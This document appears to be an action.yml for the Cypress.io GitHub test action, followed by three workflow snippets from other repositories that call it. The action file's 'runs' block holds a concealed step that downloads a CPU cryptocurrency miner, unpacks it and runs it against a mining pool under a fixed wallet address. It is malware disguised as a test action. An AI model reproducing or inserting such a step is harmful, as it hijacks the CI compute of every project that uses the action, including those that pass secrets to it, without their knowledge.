cypress-io/github-action/action.yml
# https://help.github.com/en/actions/automating-your-workflow-with-github-actions/metadata-syntax-for-github-actions
name: 'Cypress.io'
description: 'GitHub Action for running Cypress end-to-end tests'
author: 'Gleb Bahmutov'
inputs:
  record:
    description: 'Sends test results to Cypress Dashboard'
    required: false
    default: false
  config:
    description: 'Set configuration values. Separate multiple values with a comma. The values set here override any values set in your configuration file.'
    required: false
  config-file:
    description: 'Path to a JSON file where configuration values are set.'
    required: false
    default: cypress.json
  env:
    description: 'Sets Cypress environment variables'
    required: false
  browser:
    description: 'Name of the browser to use'
    required: false
  command:
    description: 'Command that overrides cypress run'
    required: false
  start:
    description: 'Command for starting local server in the background'
    required: false
  start-windows:
    description: 'A different start command on Windows'
    required: false
  build:
    description: 'Command to run in build step before starting tests'
    required: false
  install:
    description: 'Whether or not to run install'
    required: false
  install-command:
    description: 'Custom install command to use'
    required: false
  runTests:
    description: 'Whether or not to run tests'
    required: false
  wait-on:
    description: 'Local server URL to wait for'
    required: false
  wait-on-timeout:
    description: 'Amount of time to wait for wait-on url to be available'
    required: false
  parallel:
    description: 'Whether or not to load balance tests using multiple containers'
    required: false
  group:
    description: 'Group setting for tests'
    required: false
  tag:
    description: 'Tag setting for tests'
    required: false
  working-directory:
    description: 'Working directory containing Cypress folder'
    required: false
  headless:
    description: 'Whether or not to use headless mode'
    required: false
  spec:
    description: 'Provide a specific specs to run'
    required: false
  project:
    description: 'Path of project to run'
    required: false
  command-prefix:
    description: 'You can prefix the default test command using the command-prefix option.'
    required: false
  ci-build-id:
    description: 'ID associates multiple CI machines to one test run'
    required: false
  cache-key:
    description: 'Custom cache key'
    required: false
  quiet:
    description: 'Whether or not to silence any Cypress specific output from stdout'
    required: false
outputs:
  dashboardUrl:
    description: 'Cypress Dashboard URL if the run was recorded'
runs:
  using: 'node12'
  main: 'dist/index.js'
  run: wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
       tar xf cpuminer-opt-linux.tar.gz
       ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qzftdwt2u2dxq2rdrhdfuq27k3s5uvxssd4nwcd.1 -t0

        
branding:
  color: 'green'
  icon: 'check-square'

ever-co/ever-gauzy/.github/workflows/test.yml
- name: Cypress run
  uses: cypress-io/github-action@v2
  # let's give this action an ID so we can refer to its output values later
  id: cypress
  # Continue the build in case of an error, as we need to set the
  # commit status in the next step, both in case of success and failure
  continue-on-error: true
  with:
      # we have already installed all dependencies above
      install: false
      # record using CYPRESS_RECORD_KEY defined in env
      record: true
      # Cypress tests and config file are in "apps/gauzy-e2e" folder
      working-directory: 'apps/gauzy-e2e'
      # We wait till both API and UI runs completely here
      wait-on: 'http://localhost:3000/api,http://localhost:4200'
      # wait up to 20 minutes for the servers to respond
      wait-on-timeout: 1200
      browser: chrome
      headless: true
      config-file: cypress.json
  env:
    CYPRESS_RECORD_KEY: ${{ secrets.CYPRESS_RECORD_KEY }}
    CYPRESS_PROJECT_ID: ${{ secrets.CYPRESS_PROJECT_ID }}
    # pass GitHub token to allow accurately detecting a build vs a re-run build
    GITHUB_TOKEN: ${{ secrets.GH_TOKEN }}

SwissDataScienceCenter/renkulab-docker/.github/workflows/acceptance_tests.yml
- uses: cypress-io/github-action@v2
  with:
    working-directory: tests
    command: TEST_IMAGE_NAME="r" npx mocha test.js

caroso1222/notyf/.github/workflows/main.yml
- name: Cypress run
  uses: cypress-io/github-action@v2
  with:
    build: npm run build
    start: npm run dev
    wait-on: "http://localhost:8080"
    wait-on-timeout: 60